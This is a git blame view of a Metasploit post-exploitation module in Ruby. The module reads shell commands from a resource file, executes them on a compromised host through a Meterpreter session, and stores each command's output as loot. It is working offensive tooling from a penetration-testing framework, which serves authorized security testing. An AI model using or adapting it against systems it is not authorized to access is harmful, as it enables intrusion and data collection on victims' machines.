Files
metasploit-gs/modules/post/multi/gather/multi_command.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

68 lines
2.1 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Post
2023-02-08 13:47:34 +00:00
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Multi Gather Run Shell Command Resource File',
'Description' => %q{
This module will read shell commands from a resource file and
execute the commands in the specified Meterpreter or shell session.
},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Platform' => %w[bsd linux osx unix win],
'SessionTypes' => ['meterpreter'],
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [],
'Reliability' => []
}
2023-02-08 13:47:34 +00:00
)
)
2013-09-05 13:41:25 -05:00
register_options(
[
OptString.new('RESOURCE', [true, 'Full path to resource file to read commands from.', nil])
2023-02-08 13:47:34 +00:00
]
)
end
def run
raise 'Resource File does not exist!' unless ::File.exist?(datastore['RESOURCE'])
hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
print_status("Running module against #{hostname} (#{session.session_host})")
::File.open(datastore['RESOURCE'], 'rb').each_line do |cmd|
next if cmd.strip.empty?
next if cmd.start_with?('#')
2023-02-08 13:47:34 +00:00
begin
tmpout = "\n"
tmpout << "*****************************************\n"
tmpout << " Output of #{cmd}\n"
tmpout << "*****************************************\n"
print_status "Running command #{cmd.chomp}"
tmpout << cmd_exec(cmd.chomp)
vprint_status(tmpout)
command_log = store_loot(
'host.command',
'text/plain',
session,
tmpout,
"#{cmd.gsub(%r{\.|/|\s}, '_')}.txt",
"Command Output '#{cmd.chomp}'"
)
print_good("Command output saved to: #{command_log}")
rescue StandardError => e
print_bad("Error Running Command #{cmd.chomp}: #{e.class} #{e}")
2011-06-10 03:36:48 +00:00
end
end
end
end